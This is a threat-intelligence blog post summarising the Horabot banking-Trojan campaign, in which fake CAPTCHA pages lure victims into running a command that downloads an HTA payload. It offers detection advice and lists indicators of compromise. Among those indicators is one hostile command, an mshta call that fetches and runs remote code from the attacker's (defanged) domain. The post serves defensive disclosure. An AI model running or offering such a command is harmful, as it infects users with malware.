Unveiling the Horabot campaign: Strategies to detect this stealthy malware

Mar 19, 2026 | Threat Intelligence Research

Horabot Campaign Targets Users with Sophisticated Phishing Techniques

Threat intelligence from Kaspersky highlights the ongoing threat posed by the Horabot campaign, which leverages a banking Trojan and an intricate attack chain. The campaign remains active, as evidenced by several incidents recently investigated by Kaspersky’s Managed Detection and Response (MDR) team.

The attack typically initiates with users encountering a fraudulent CAPTCHA page, exemplified by a recent alert for a suspicious URL. Victims are misled into executing a command that triggers a malicious HTA file download. This file subsequently executes a payload that connects to the attacker’s server to retrieve additional malicious JavaScript. The execution of this command signifies a critical entry point for the threat actor, showcasing the need for vigilance against social engineering methods.

The attack chain consists of two primary stages. Initially, users are duped into accessing the fake CAPTCHA page, which appears similar to other known phishing attempts. Once engaged, an HTA file is downloaded and run, leading to further downloads of malicious scripts. These dynamics illustrate the use of server-side polymorphism, where the payload is designed to dynamically generate additional scripts, thereby complicating detection efforts.

Defensive Context

This attack primarily targets individuals and organizations susceptible to social engineering tactics. Users who frequently engage with online services or financial platforms should be particularly aware, as the campaign exploits typical browsing behaviors. Organizations with inadequate user awareness programs or insufficient endpoint protections are at greater risk.

Why This Matters
The risk from the Horabot campaign is notable for sectors handling sensitive financial data. Users leveraging online banking services may find themselves in jeopardy if they interact with materials disseminated through these phishing techniques. The nuanced nature of this threat underscores the necessity for targeted user education to mitigate the risks associated with such convincing social engineering narratives.

Defender Considerations
For defenders, understanding the intricacies of the Horabot campaign is crucial. Specifically, monitoring for any signs of mshta activity, which was key in the initial incident alert, may provide early detection opportunities. Moreover, security teams should investigate any alerts or unusual behaviors around URLs tied to this campaign to preemptively stop further incidents.

Indicators of Compromise (IOCs)

  • Malicious URL: https://evs.grupotuis[.]buzz/0capcha17/
  • Command executed by the victim: mshta https://evs.grupotuis[.]buzz/0capcha17/DMEENLIGGB.hta

These indicators provide concrete references for analysts seeking to identify or mitigate risks associated with the Horabot campaign.

Click here for the full article

Try our Intelligence today!

Streamline your security operations with a free Q-Feeds trial and see the difference.

Other articles